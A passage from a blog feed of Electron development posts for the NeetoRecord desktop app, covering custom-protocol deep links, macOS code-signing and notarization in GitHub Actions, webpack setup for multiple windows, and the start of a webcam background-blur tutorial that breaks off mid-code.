<content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 6 of the blog series. You can also read about <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>, <a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>, <a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>, <a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>, <a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing a desktop application, including every feature directly within the app is often unnecessary. Instead, we can offload some tasks, such as login/signup, to a web application, and from the web app, create deep-links to the desktop app. We can also create shareable links that open specific content in the app.</p><p>In this blog, we are going to discuss how to create deep-links in our <a href="https://electronjs.org/">Electron</a> application.</p><h2>Register a custom protocol</h2><p>A protocol is a custom URL scheme that an application can handle, similar to how browsers handle protocols like <code>http</code>, <code>https</code>, <code>mailto</code>, or <code>ftp</code>. Every operating system supports the handling of custom protocols. We can register an application as a default handler for a custom protocol with the operating system.
Electron provides a simple API to register a default protocol client.</p><pre><code class="language-js">if (process.defaultApp) {
  if (process.argv.length &gt;= 2) {
    app.setAsDefaultProtocolClient(&quot;my-app&quot;, process.execPath, [
      path.resolve(process.argv[1]),
    ]);
  }
} else {
  app.setAsDefaultProtocolClient(&quot;my-app&quot;);
}</code></pre><p>The code snippet above is a simple example of registering a default protocol client. In the example, we registered a custom protocol named <code>my-app</code> with the operating system. It's important to note that the application must be properly packaged and installed so that the operating system can correctly handle and launch the registered app.</p><p>We used <code>process.defaultApp</code> instead of <code>app.isPackaged</code> because Electron allows us to run a packaged app using the <code>electron .</code> command. In such cases, we need to provide the execution path for the system to recognize the app. However, if the app is running in normal mode, simply calling <code>app.setAsDefaultProtocolClient</code> is sufficient.</p><h2>Handling custom protocol</h2><p>Though registering the protocol is simple and the same for every platform, there are some differences when it comes to handling it.</p><p><strong>For macOS</strong>, we need to listen to the <code>open-url</code> event.</p><pre><code class="language-js">const handleCustomUrl = url =&gt; {
  // Handle url
};

app.on(&quot;open-url&quot;, (event, url) =&gt; {
  handleCustomUrl(url);
});</code></pre><p><strong>On both Windows and Linux</strong>, if the application is up and running, a <code>second-instance</code> event is emitted instead of <code>open-url</code> when a protocol request is received. This means a new instance of our app will be created. If we want to avoid this behavior and notify the existing instance instead, we'll need to ensure the app runs as a single instance.
We can achieve this by using <code>requestSingleInstanceLock</code>.</p><pre><code class="language-js">const gotTheLock = app.requestSingleInstanceLock();
if (!gotTheLock) {
  app.quit();
}</code></pre><p>The above code ensures that our Windows or Linux app runs as a single instance. If a user attempts to open a new instance, that instance will try to acquire the single instance lock. If it fails, the newly created instance will simply quit.</p><pre><code class="language-js">const gotTheLock = app.requestSingleInstanceLock();
if (!gotTheLock) {
  app.quit();
} else {
  app.on(&quot;second-instance&quot;, (event, commands, workingDir) =&gt; {
    handleCustomUrl(commands.pop());
  });
}</code></pre><p>If we successfully acquire the single instance lock, it means we're running the first instance of the app. When a user attempts to open another instance, Electron emits a <code>second-instance</code> event to the existing instance. The second argument of this event contains an array of command-line arguments, and we can retrieve the custom URL from the last item in this array.</p><p>We've addressed the case where the app is already running, but what happens if the app is completely closed and a protocol request is made? On <strong>macOS</strong>, there's nothing extra to do; the app will launch, and the <code>open-url</code> event will be triggered automatically.</p><p>However, for <strong>Windows and Linux</strong>, the behavior is different. The <code>second-instance</code> event won't be triggered since the app is starting for the first time. Instead, we can retrieve the custom URL from <code>process.argv</code>, as the app will start with the protocol URL passed as one of its parameters.
To handle this case, we need to check <code>process.argv</code> when the app is started.</p><pre><code class="language-js">const handleCustomUrl = url =&gt; {
  // Handle url
};

app.whenReady().then(() =&gt; {
  const customUrl = process.argv.find(item =&gt; item.startsWith(&quot;my-app://&quot;));
  if (customUrl) {
    handleCustomUrl(customUrl);
  }
});</code></pre><p>Here, when the app is ready, we look for an item in <code>process.argv</code> that starts with our URL scheme (<code>my-app://</code>); if one is found, we can confirm that this instance was started by a protocol request.</p><p>Great! Here's the complete solution that works across all platforms, whether the app is already running or not.</p><pre><code class="language-js">if (process.defaultApp) {
  if (process.argv.length &gt;= 2) {
    app.setAsDefaultProtocolClient(&quot;my-app&quot;, process.execPath, [
      path.resolve(process.argv[1]),
    ]);
  }
} else {
  app.setAsDefaultProtocolClient(&quot;my-app&quot;);
}

const handleCustomUrl = url =&gt; {
  // Handle url
};

app.on(&quot;open-url&quot;, (event, url) =&gt; {
  handleCustomUrl(url);
});

const gotTheLock = app.requestSingleInstanceLock();
if (!gotTheLock) {
  app.quit();
} else {
  app.on(&quot;second-instance&quot;, (event, commands, workingDir) =&gt; {
    handleCustomUrl(commands.pop());
  });
}

app.whenReady().then(() =&gt; {
  const customUrl = process.argv.find(item =&gt; item.startsWith(&quot;my-app://&quot;));
  if (customUrl) {
    handleCustomUrl(customUrl);
  }
});</code></pre><h2>Packaging</h2><p>On macOS and Linux, this feature is only functional when our app is packaged; it won't work during development when launching from the command line. To ensure proper functionality, we must update the macOS <code>Info.plist</code> file and the Linux <code>.desktop</code> file to include the new protocol handler when packaging our app.
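</p><p>For reference, this is roughly what the packaged artifacts end up containing (a sketch; the exact entries are generated by the packaging tool and may differ). On macOS, the <code>Info.plist</code> gains a <code>CFBundleURLTypes</code> entry, and on Linux the <code>.desktop</code> file registers a scheme handler:</p><pre><code class="language-xml">&lt;!-- Info.plist (macOS) --&gt;
&lt;key&gt;CFBundleURLTypes&lt;/key&gt;
&lt;array&gt;
  &lt;dict&gt;
    &lt;key&gt;CFBundleURLName&lt;/key&gt;
    &lt;string&gt;my-app-protocol&lt;/string&gt;
    &lt;key&gt;CFBundleURLSchemes&lt;/key&gt;
    &lt;array&gt;
      &lt;string&gt;my-app&lt;/string&gt;
    &lt;/array&gt;
  &lt;/dict&gt;
&lt;/array&gt;</code></pre><pre><code># my-app.desktop (Linux)
MimeType=x-scheme-handler/my-app;</code></pre><p>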
This allows the operating system to recognize and handle the custom URLs correctly.</p><p><code>electron-builder</code> handles this internally when packaging the app; we just need to configure <code>electron-builder</code> accordingly. To learn more about how to package our app using <code>electron-builder</code>, check out <a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a>.</p><pre><code class="language-json">&quot;build&quot;: {
  &quot;productName&quot;: &quot;NeetoRecord&quot;,
  &quot;appId&quot;: &quot;com.neeto.neetoRecord&quot;,
  &quot;protocols&quot;: {
    &quot;name&quot;: &quot;my-app-protocol&quot;,
    &quot;schemes&quot;: [
      &quot;my-app&quot;
    ]
  },
  &quot;win&quot;: {...},
  &quot;linux&quot;: {...},
  &quot;mac&quot;: {...}
}</code></pre><p>We can use the <code>protocols</code> field for that: give it a name, pass an array of URL schemes the app supports, and <code>electron-builder</code> will handle the rest.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to code-sign and notarize an Electron application for macOS]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app"/>
      <updated>2024-11-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app</id>
<content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 5 of the blog series. You can also read about <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>, <a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>, <a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>, <a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>, <a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>macOS identifies applications that are not code-signed and notarized as being from unknown publishers and blocks their installation. Code-signing allows macOS to recognize the application's creator. Notarization, an additional step, provides extra credibility and security, ensuring a safer experience for users.</p><h3>What is code-signing?</h3><p>Code-signing is the process of generating a unique digital fingerprint of the code using a cryptographic hash function. This fingerprint is combined with a certificate from a trusted Certificate Authority (CA) to create the digital signature. When users download or execute the software, the operating system verifies this signature to confirm its authenticity.</p><p>Apple prefers developers to use certificates issued through the Apple Developer Program to sign macOS applications. This is because macOS verifies signatures against Apple's own Certificate Authority.
If a third-party certificate is used, macOS might not recognize it as trusted, leading to warnings or blocking the application from running due to <a href="https://support.apple.com/en-in/guide/security/sec5599b66df/web">Gatekeeper</a>, Apple's security feature.</p><h3>Enroll in the Apple developer program</h3><p>We should enroll in the Apple developer program (which costs $99 per year) to create a certificate that we can use to code-sign our application. We can follow <a href="https://developer.apple.com/programs/enroll/">this link</a> to know what we need to enroll in the Apple developer program.</p><h3>Apple certificates</h3><p>Apple provides two main types of code-signing certificates:</p><ul><li><strong>Developer ID Certificate:</strong> Used to sign apps distributed outside the Mac App Store. Apps signed with this can be Gatekeeper-approved.</li><li><strong>Mac App Distribution Certificate:</strong> Required for submitting apps to the Mac App Store. Apple will re-sign the application after review and approval for distribution on the Mac App Store.</li></ul><p>In this blog, we will look into how to code-sign an <a href="https://electronjs.org/">Electron</a> application using a <strong>Developer ID Certificate</strong>.</p><h3>Create a Developer ID certificate</h3><p>To create a Developer ID certificate, we can follow Apple's detailed guide on <a href="https://developer.apple.com/help/account/create-certificates/create-developer-id-certificates/">how to create a Developer ID certificate</a>.</p><p>Once we've successfully created the certificate and downloaded the <code>.cer</code> file, the next step is to convert this file into a <code>.p12</code> format.</p><p>First, we'll need to convert the <code>.cer</code> file into a <code>.pem</code> format.
We can do this using <code>openssl</code>.</p><pre><code class="language-bash">openssl x509 -in certificate.cer -inform DER -out certificate.pem -outform PEM</code></pre><p>Then, use the <code>.pem</code> file and our private <code>.key</code> to generate the <code>.p12</code> file.</p><pre><code class="language-bash">openssl pkcs12 -export -out certificate.p12 -inkey certificate-private.key -in certificate.pem</code></pre><p>When generating the <code>.p12</code> file, we'll be prompted to set a password. Save this password in a secure location, as we'll need it later when code-signing the application.</p><p>To use this certificate with our existing GitHub Actions workflow to automate the deployment process, we need to convert the <code>.p12</code> file into a base64 string. This is necessary because GitHub doesn't allow uploading files as secrets, but we can store the base64 string instead.</p><pre><code class="language-bash">openssl base64 -in certificate.p12 -out certificate.txt</code></pre><p>The command will output the base64 version of the <code>.p12</code> file into a <code>certificate.txt</code> file. We can then add the text contents of this file as a secret in GitHub. Save the base64 string in a GitHub secret named <code>CSC_CONTENT</code> and the password in one named <code>CSC_KEY_PASSWORD</code>.</p><h3>Update Electron build process</h3><p>To code-sign a macOS app, we just need to pass the certificate and password to the <a href="https://www.electron.build/">electron-builder</a> <code>publish</code> command.
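The base64 round trip used for this secret can be sanity-checked locally. A minimal Node sketch, with dummy bytes standing in for a real <code>.p12</code> file:

```javascript
// Dummy binary data standing in for the contents of certificate.p12.
const p12Bytes = Buffer.from([0x30, 0x82, 0x01, 0x0a, 0x00, 0xff, 0x7f]);

// What we store as the CSC_CONTENT secret in GitHub: plain text, safe for secrets.
const secret = p12Bytes.toString("base64");

// What the workflow's `base64 --decode` step reconstructs on the runner.
const restored = Buffer.from(secret, "base64");

console.log(typeof secret, p12Bytes.equals(restored)); // string true
```

The encode/decode pair is lossless, so the certificate the runner writes back is byte-identical to the original.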
However, since we saved our certificate as a base64 string, we need to convert it back to a <code>.p12</code> file before publishing.</p><pre><code class="language-yml">- name: Publish releases
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY }}
    AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET }}
    CSC_CONTENT: ${{ secrets.CSC_CONTENT }}
    CSC_KEY_PASSWORD: ${{ secrets.CSC_KEY_PASSWORD }}
  run: |
    echo &quot;$CSC_CONTENT&quot; | base64 --decode &gt; certificate.p12
    export CSC_LINK=&quot;./certificate.p12&quot;
    npm exec electron-builder -- --publish always -mwl</code></pre><p>As mentioned above, we first decoded the base64 string back to a <code>certificate.p12</code> file. We then set the path to this file as <code>CSC_LINK</code>, which <code>electron-builder</code> expects.</p><p>Great! With everything in place, running this workflow should successfully code-sign our application.</p><h2>Notarize</h2><p>Code-signing allows macOS to recognize the application's creator, but this alone is insufficient. Users will still see a warning stating, <strong>&quot;macOS cannot verify if the app is free from malware.&quot;</strong></p><p>To eliminate this warning, we need to notarize our application. <a href="https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution">Notarization</a> is a security feature introduced by Apple to ensure that macOS applications are safe and free of malicious content. It's an additional layer of security that builds on code-signing. The notarization process involves submitting our app to Apple for automated security checks. Once notarized, macOS will recognize the app as trustworthy, ensuring smooth installation and execution on users' systems, even when downloaded from outside the Mac App Store.</p><p>To notarize, we need to create an &quot;App-specific password&quot;.
To create an App-specific password:</p><ul><li>Sign in to <a href="https://appleid.apple.com/account/home">appleid.apple.com</a>.</li><li>In the Sign-In and Security section, select App-Specific Passwords.</li><li>Select Generate an app-specific password or select the Add button (+).<img src="/blog_images/2024/code-sign-notorize-mac-desktop-app/app-specific-1.png" alt="app specific password 1"></li><li>Then give a name for the password and click <code>Create</code>.<img src="/blog_images/2024/code-sign-notorize-mac-desktop-app/app-specific-2.png" alt="app specific password 2"></li></ul><p>A new App-Specific Password will be generated. Save it in a safe place. We will use this password to notarize our macOS application.</p><h3>Update Electron build process</h3><p>Add <code>APPLE_APP_SPECIFIC_PASSWORD</code>, <code>TEAM_ID</code>, and <code>APPLE_ID</code> to GitHub secrets. Then load these secrets as environment variables along with the others in our GitHub Actions workflow.</p><pre><code class="language-yml">- name: Publish releases
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY }}
    AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET }}
    CSC_CONTENT: ${{ secrets.CSC_CONTENT }}
    CSC_KEY_PASSWORD: ${{ secrets.CSC_KEY_PASSWORD }}
    TEAM_ID: ${{ secrets.TEAM_ID }}
    APPLE_ID: ${{ secrets.APPLE_ID }}
    APPLE_APP_SPECIFIC_PASSWORD: ${{ secrets.APPLE_APP_SPECIFIC_PASSWORD }}
  run: |
    echo &quot;$CSC_CONTENT&quot; | base64 --decode &gt; certificate.p12
    export CSC_LINK=&quot;./certificate.p12&quot;
    npm exec electron-builder -- --publish always -mwl</code></pre><p>At the time of writing this, we encountered issues with the built-in notarize feature of <code>electron-builder</code>, so we created a custom script to handle the notarization process.</p><pre><code class="language-js">const { notarize } = require(&quot;@electron/notarize&quot;);
const { build } = require(&quot;../package.json&quot;);

const notarizeMacos = async context =&gt; {
  const { electronPlatformName, appOutDir } = context;
  if (electronPlatformName !== &quot;darwin&quot;) return;

  if (process.env.CI !== &quot;true&quot;) {
    console.warn(&quot;Skipping notarizing step. Packaging is not running in CI&quot;);
    return;
  }

  const appName = context.packager.appInfo.productFilename;

  await notarize({
    tool: &quot;notarytool&quot;,
    appBundleId: build.appId,
    appPath: `${appOutDir}/${appName}.app`,
    teamId: process.env.TEAM_ID,
    appleId: process.env.APPLE_ID,
    appleIdPassword: process.env.APPLE_APP_SPECIFIC_PASSWORD,
    verbose: true,
  });

  console.log(&quot;--- notarization completed ---&quot;);
};

exports.default = notarizeMacos;</code></pre><p>The script uses the <code>notarize</code> function from the <code>@electron/notarize</code> package. It passes the path to the <code>.app</code> file generated during the build process, along with the required <code>TEAM_ID</code>, <code>APPLE_ID</code>, and <code>APPLE_APP_SPECIFIC_PASSWORD</code>, which were obtained earlier.</p><p>To run the custom notarization script, disable the built-in notarization feature in the <code>electron-builder</code> configuration. Then, call this script from the <code>afterSign</code> callback to ensure it runs after the signing process is complete.</p><pre><code class="language-json">&quot;build&quot;: {
  &quot;mac&quot;: {
    &quot;notarize&quot;: false,
    &quot;target&quot;: {
      &quot;target&quot;: &quot;default&quot;,
      &quot;arch&quot;: [
        &quot;arm64&quot;,
        &quot;x64&quot;
      ]
    }
  },
  &quot;afterSign&quot;: &quot;./scripts/notarize.js&quot;
}</code></pre><p>Great! We have successfully code-signed and notarized our macOS application. Now, macOS will trust our application, and an added benefit of this process is that it allows us to auto-update our application seamlessly, ensuring that users always have the latest version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring webpack to handle multiple browser windows in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/electron-multiple-browser-windows"/>
      <updated>2024-11-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/electron-multiple-browser-windows</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 4 of the blog series. You can also read <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>, <a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>, <a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>, <a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>, <a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing desktop applications with Electron, managing multiple browser windows within a single app is often necessary. Whether we need to display different types of content or create a more complex user interface, handling multiple windows efficiently can be challenging.</p><p>In this blog, we'll explore how to configure Webpack to manage multiple browser windows in our Electron application, ensuring that each window operates smoothly in our project.</p><h3>Configuring Webpack for a Single Browser Window</h3><p>Before diving into the setup for multiple windows, let's first review how to configure Webpack for a single browser window. This example focuses on the renderer process, which is responsible for rendering the UI and handling interactions.
If you're interested in learning how to configure Webpack for the entire Electron app, including the main process, check out <a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a>.</p><p>Consider the following typical folder structure for an Electron project:</p><pre><code class="language-js">electron-app
  assets
  app
  src
    main
      main.js
    renderer
      App.jsx
      index.ejs
  node_modules
  package.json</code></pre><p>This structure separates the code for the <code>main</code> and <code>renderer</code> processes, which is a standard practice in Electron projects.</p><p>Here's how we can configure Webpack for a single browser window:</p><pre><code class="language-js">// ./config/webpack/renderer.mjs
import webpack from &quot;webpack&quot;;
import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;

const configuration = {
  target: [&quot;web&quot;, &quot;electron-renderer&quot;],
  entry: &quot;src/renderer/App.jsx&quot;,
  output: {
    path: &quot;app/dist/renderer&quot;,
    publicPath: &quot;./&quot;,
    filename: &quot;renderer.js&quot;,
    library: {
      type: &quot;umd&quot;,
    },
  },
  module: {...},  // Module configuration (loaders, etc.)
  optimization: {...},  // Optimization settings (minification, etc.)
  plugins: [
    // Other plugins...
    new HtmlWebpackPlugin({
      filename: &quot;app.html&quot;,
      template: &quot;src/renderer/index.ejs&quot;,
    }),
  ],
};

export default configuration;</code></pre><p>In this configuration:</p><ul><li>The <code>target</code> is set to <code>[&quot;web&quot;, &quot;electron-renderer&quot;]</code>, enabling both standard web and Electron renderer environments.</li><li>The <code>entry</code> specifies the entry point for the renderer process, which is <code>src/renderer/App.jsx</code>.</li><li>The output is bundled into a single file named <code>renderer.js</code>, which is stored in the <code>app/dist/renderer</code> directory.
In an Electron app, it's often preferable to bundle everything into a single file since the files are loaded locally.</li><li>The <code>HtmlWebpackPlugin</code> generates an <code>app.html</code> file from a template (<code>index.ejs</code>), embedding the necessary script to load <code>renderer.js</code>.</li></ul><p>We can compile and bundle our frontend code using the following command:</p><pre><code class="language-bash">webpack --config ./config/webpack/renderer.mjs</code></pre><p>This will produce an <code>app.html</code> file in the <code>app/dist/renderer</code> directory, along with <code>renderer.js</code>.</p><pre><code class="language-html">&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset=utf-8&gt;
    &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;
    &lt;title&gt;MyApp&lt;/title&gt;
    &lt;script defer=defer src=./renderer.js&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div id=root&gt;&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;</code></pre><p>The <code>HtmlWebpackPlugin</code> correctly injects the <code>&lt;script/&gt;</code> tag to load <code>renderer.js</code>. This <code>app.html</code> can now be loaded into a browser window from the <code>main</code> process.</p><pre><code class="language-js">const appWindow = new BrowserWindow({
  show: false,
  width: 1408,
  height: 896,
});

appWindow.loadURL(&quot;app/dist/renderer/app.html&quot;);

appWindow.on(&quot;ready-to-show&quot;, () =&gt; {
  appWindow.show();
});</code></pre><h3>Configuring Webpack for Multiple Browser Windows</h3><p>With the single window setup complete, let's add another browser window to the app.
For example, let's say we want to create a <code>Settings.jsx</code> component within the renderer folder:</p><pre><code class="language-js">electron-app
  assets
  app
  src
    main
      main.js
    renderer
      App.jsx
      Settings.jsx
      index.ejs
  node_modules
  package.json</code></pre><p>Previously, we bundled all JavaScript code into a single <code>renderer.js</code> file. However, since we're now working with multiple windows, it makes sense to create separate bundles for each window: one for the <code>App</code> window and another for the <code>Settings</code> window. To achieve this, we can specify multiple entry points in Webpack:</p><pre><code class="language-js">// ./config/webpack/renderer.mjs
import webpack from &quot;webpack&quot;;
import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;

const configuration = {
  target: [&quot;web&quot;, &quot;electron-renderer&quot;],
  entry: {
    app: &quot;src/renderer/App.jsx&quot;,
    settings: &quot;src/renderer/Settings.jsx&quot;,
  },
  output: {
    path: &quot;app/dist/renderer&quot;,
    publicPath: &quot;./&quot;,
    filename: &quot;[name].js&quot;, // Use placeholders to generate separate bundles
    library: {
      type: &quot;umd&quot;,
    },
  },
  // Other configuration options...
};

export default configuration;</code></pre><p>In this configuration:</p><ul><li>The <code>entry</code> property now contains two entry points: <code>app</code> and <code>settings</code>. Webpack will generate separate bundles for each, named <code>app.js</code> and <code>settings.js</code> respectively.</li><li>The <code>filename</code> in the <code>output</code> section uses the <code>[name]</code> placeholder to dynamically generate filenames based on the entry point names.</li></ul><p>Next, we need to generate two HTML files, one for each window.
We can achieve this by adding another instance of <code>HtmlWebpackPlugin</code> to the <code>plugins</code> array:</p><pre><code class="language-js">// ./config/webpack/renderer.mjs
import webpack from &quot;webpack&quot;;
import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;

const configuration = {
  target: [&quot;web&quot;, &quot;electron-renderer&quot;],
  entry: {
    app: &quot;src/renderer/App.jsx&quot;,
    settings: &quot;src/renderer/Settings.jsx&quot;,
  },
  output: {
    path: &quot;app/dist/renderer&quot;,
    publicPath: &quot;./&quot;,
    filename: &quot;[name].js&quot;,
    library: {
      type: &quot;umd&quot;,
    },
  },
  module: {...},
  optimization: {...},
  plugins: [
    // Other plugins...
    new HtmlWebpackPlugin({
      filename: &quot;app.html&quot;,
      template: &quot;src/renderer/index.ejs&quot;,
      chunks: [&quot;app&quot;], // Load only the 'app' bundle
    }),
    new HtmlWebpackPlugin({
      filename: &quot;settings.html&quot;,
      template: &quot;src/renderer/index.ejs&quot;,
      chunks: [&quot;settings&quot;], // Load only the 'settings' bundle
    }),
  ],
};

export default configuration;</code></pre><p>By specifying the <code>chunks</code> property for each <code>HtmlWebpackPlugin</code> instance, we ensure that each HTML file only includes the appropriate JavaScript bundle.
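As a toy illustration of how the <code>[name]</code> placeholder pairs entry points with bundles and HTML files (plain Node string substitution, not webpack itself; the <code>expand</code> helper is made up for this sketch):

```javascript
// Each entry name is substituted into the "[name]" filename template,
// and each HtmlWebpackPlugin instance picks exactly one chunk.
const entries = {
  app: "src/renderer/App.jsx",
  settings: "src/renderer/Settings.jsx",
};

const expand = template => name => template.replace("[name]", name);

const bundles = Object.keys(entries).map(expand("[name].js"));
const htmlFiles = Object.keys(entries).map(expand("[name].html"));

console.log(bundles); // [ 'app.js', 'settings.js' ]
console.log(htmlFiles); // [ 'app.html', 'settings.html' ]
```

Adding a third window is then just one more entry plus one more <code>HtmlWebpackPlugin</code> instance.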
The final output will include two HTML files:</p><pre><code class="language-html">&lt;!-- app.html --&gt;
&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset=utf-8&gt;
    &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;
    &lt;title&gt;MyApp&lt;/title&gt;
    &lt;script defer=defer src=./app.js&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div id=root&gt;&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;

&lt;!-- settings.html --&gt;
&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset=utf-8&gt;
    &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;
    &lt;title&gt;MyApp&lt;/title&gt;
    &lt;script defer=defer src=./settings.js&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div id=root&gt;&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;</code></pre><p>Finally, from the <code>main</code> process, we can easily create two browser windows, each with its own renderer code:</p><pre><code class="language-js">const appWindow = new BrowserWindow({
  show: false,
  width: 1408,
  height: 896,
});

appWindow.loadURL(&quot;app/dist/renderer/app.html&quot;);

appWindow.on(&quot;ready-to-show&quot;, () =&gt; {
  appWindow.show();
});

const settingsWindow = new BrowserWindow({
  show: false,
  width: 1408,
  height: 896,
});

settingsWindow.loadURL(&quot;app/dist/renderer/settings.html&quot;);

settingsWindow.on(&quot;ready-to-show&quot;, () =&gt; {
  settingsWindow.show();
});</code></pre><p>With this setup, each browser window will load its own dedicated JavaScript bundle, ensuring that our Electron application is both efficient and modular. This approach not only makes our code easier to manage but also enhances the performance of our application by reducing unnecessary code loading.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Creating blurred or virtual backgrounds in real-time video in React apps]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/video-background-removal"/>
      <updated>2024-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/video-background-removal</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 3 of the blog series. You can also read <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>, <a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>, <a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>, <a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>, <a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Modern tools like Zoom and Google Meet allow us to blur or completely replace our background in real-time video, creating a polished and distraction-free environment regardless of where we are.</p><p>This is possible because of advancements in machine learning. In this blog, we'll explore how to achieve real-time background blurring and replacement using TensorFlow's body segmentation capabilities.</p><h3>TensorFlow body segmentation</h3><p>TensorFlow body segmentation is a computer vision technique that involves dividing an image into distinct regions corresponding to different parts of a human body.
It typically employs deep learning models, such as convolutional neural networks (CNNs), to analyze an image and predict pixel-level labels. These labels indicate whether each pixel belongs to a specific body part, like the head, torso, arms, or legs.</p><p>The segmentation process often starts with a pre-trained model, which has been trained on large datasets. The model processes the input image through multiple layers of convolutions and pooling, gradually refining the segmentation map. The final output is a precise mask that outlines each body part, allowing for applications in areas like augmented reality, fitness tracking, and virtual try-ons.</p><p>To learn more about TensorFlow and body segmentation, check out the resources below.</p><ul><li><a href="https://www.tensorflow.org/lite/examples/segmentation/overview">TensorFlow segmentation</a></li><li><a href="https://blog.tensorflow.org/2022/01/body-segmentation.html">Body Segmentation with MediaPipe and TensorFlow.js</a></li></ul><h3>Setting up the React app</h3><p>We'll create a simple React app that streams video from the webcam.</p><pre><code class="language-js">import React, { useRef, useEffect } from &quot;react&quot;;

const App = () =&gt; {
  const videoRef = useRef(null);

  useEffect(() =&gt; {
    const getVideo = async () =&gt; {
      try {
        const stream = await navigator.mediaDevices.getUserMedia({
          video: true,
        });
        if (videoRef.current) {
          videoRef.current.srcObject = stream;
        }
      } catch (err) {
        console.error(&quot;Error accessing webcam: &quot;, err);
      }
    };

    getVideo();

    return () =&gt; {
      if (videoRef.current &amp;&amp; videoRef.current.srcObject) {
        videoRef.current.srcObject.getTracks().forEach(track =&gt; track.stop());
      }
    };
  }, []);

  return (
    &lt;div&gt;
      &lt;video ref={videoRef} autoPlay width=&quot;640&quot; height=&quot;480&quot; style={{ transform: &quot;scaleX(-1)&quot; }} /&gt;
    &lt;/div&gt;
  );
};

export default
